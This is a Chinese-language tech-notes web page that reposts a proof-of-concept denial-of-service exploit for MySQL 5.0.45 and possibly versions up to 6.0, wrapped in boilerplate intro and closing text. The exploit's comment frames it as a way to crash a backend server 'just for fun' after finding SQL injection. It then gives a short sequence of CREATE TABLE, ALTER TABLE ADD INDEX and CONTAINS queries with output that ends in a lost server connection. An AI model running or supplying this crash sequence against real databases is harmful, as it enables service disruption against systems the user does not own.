MySQL 5.0.45 (修改)拒绝服务漏洞
2022-11-12 09:16:54
内容摘要
这篇文章主要为大家详细介绍了MySQL 5.0.45 (修改)拒绝服务漏洞,具有一定的参考价值,可以用来参考一下。
对此感兴趣的朋友,看看idc笔记做的技术笔记!mysql 5.0.45 (修改)拒绝服务
文章正文
这篇文章主要为大家详细介绍了MySQL 5.0.45 (修改)拒绝服务漏洞,具有一定的参考价值,可以用来参考一下。
对此感兴趣的朋友,看看idc笔记做的技术笔记!
mysql 5.0.45 (修改)拒绝服务漏洞/** MySQL <=6.0 possibly affected* Kristian Erik Hermansen* Credit: Joe Gallo* You must have Alter permissions to exploit this bug!* Scenario: You found SQL injection, but you want to punch backend server* in the nuts just for fun. Start with the Alter TABLE statement on* a table and field you know to exist. The first two SQL statements are* simply to demostrate reproducibility...*/<snip>mysql> Create TABLE `test` (`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,`foo` text NOT NULL) ENGINE=InnoDB DEFAULT CHARSET=latin1;Query OK, 0 rows affectedmysql> Select * FROM test Where CONTAINS(foo, ''bar'');Empty setmysql> Alter TABLE test ADD INDEX (foo(100));Query OK, 0 rows affectedRecords: 0 Duplicates: 0 Warnings: 0mysql> Select * FROM test Where CONTAINS(foo, ''bar'');ERROR 2013 : Lost connection to MySQL server during query</snip>注:关于MySQL 5.0.45 (修改)拒绝服务漏洞的内容就先介绍到这里,更多相关文章的可以留意
代码注释
作者:喵哥笔记
